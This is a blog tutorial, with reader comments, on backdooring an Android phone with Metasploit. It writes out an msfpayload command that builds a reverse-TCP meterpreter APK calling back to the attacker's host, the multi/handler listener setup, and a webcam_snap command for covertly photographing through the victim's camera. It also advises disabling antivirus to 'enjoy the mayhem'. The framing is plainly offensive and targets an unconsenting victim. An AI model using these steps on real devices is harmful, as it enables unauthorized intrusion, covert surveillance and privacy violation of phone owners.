How To Hack An Android Phone By Metasploit..

In this post i will show you How To Hack An Android Phone By Metasploit.. Sounds pretty cool ha... and infact it is pretty cool.
First we need a to know What is Metasploit..??

So What is Metasploit..??

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework. see more about Metasploit

Now the interesting part...Hacking what we need for this...??

1) Kali Linux OS
2)Android Phone (rooted/non-rooted both works)
That's all....

  • First you have to create a backdoor  to exploit android you can do this by running the following command at the terminal:
root@jafar:~# msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > abc.apk
  •  now we have created our backdoor abc.apk. Just copy this abc.apk to a victim phone and install it. The application will be listed as Main Activity open it after Handler is been setup.
To create a Handler or Listener:-

root@jafar:~#msfconsole
root@jafar:~#use exploit/multi/handler
root@jafar:~#set payload android/meterpreter/reverse_tcp
root@jafar:~#set LHOST IP_Address (IP of your kali)
root@jafar:~#set LPORT Port_Number (take 4444 or just don't use this command)
root@jafar:~#exploit


after this open the Main Activity application in the Phone. If everything went right then a meterpreter session will start ...congo you are inside the Phone...
Use command like ps,ls or type help
Like you can take a snap from the camera secretly just type
root@jafar:~#webcam_snap

If there is a antivirus in the phone it can detect it... So just turn off the antivirus program and enjoy the mayhem.........
 





Previous
Next Post »

4 comments

Click here for comments
Anonymous
admin
18 August 2015 at 08:45 ×

wow great post . keep it up man. i am waiting for more stuff man.

Reply
avatar
Anonymous
admin
18 August 2015 at 09:01 ×

LHOST=X.X.X.X what is X.X.X.X in your first command ... i am new please help me :)) it will be a nice post for me if its going to work for me (h)

Reply
avatar
Anonymous
admin
29 November 2015 at 09:14 ×

msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > abc.apk

command not found ....

i guess this command has been depreted .... so please update your article.....

Reply
avatar
Tridip Das
admin
17 January 2017 at 11:34 ×

nice.. really helpful article.. finally found it...

Reply
avatar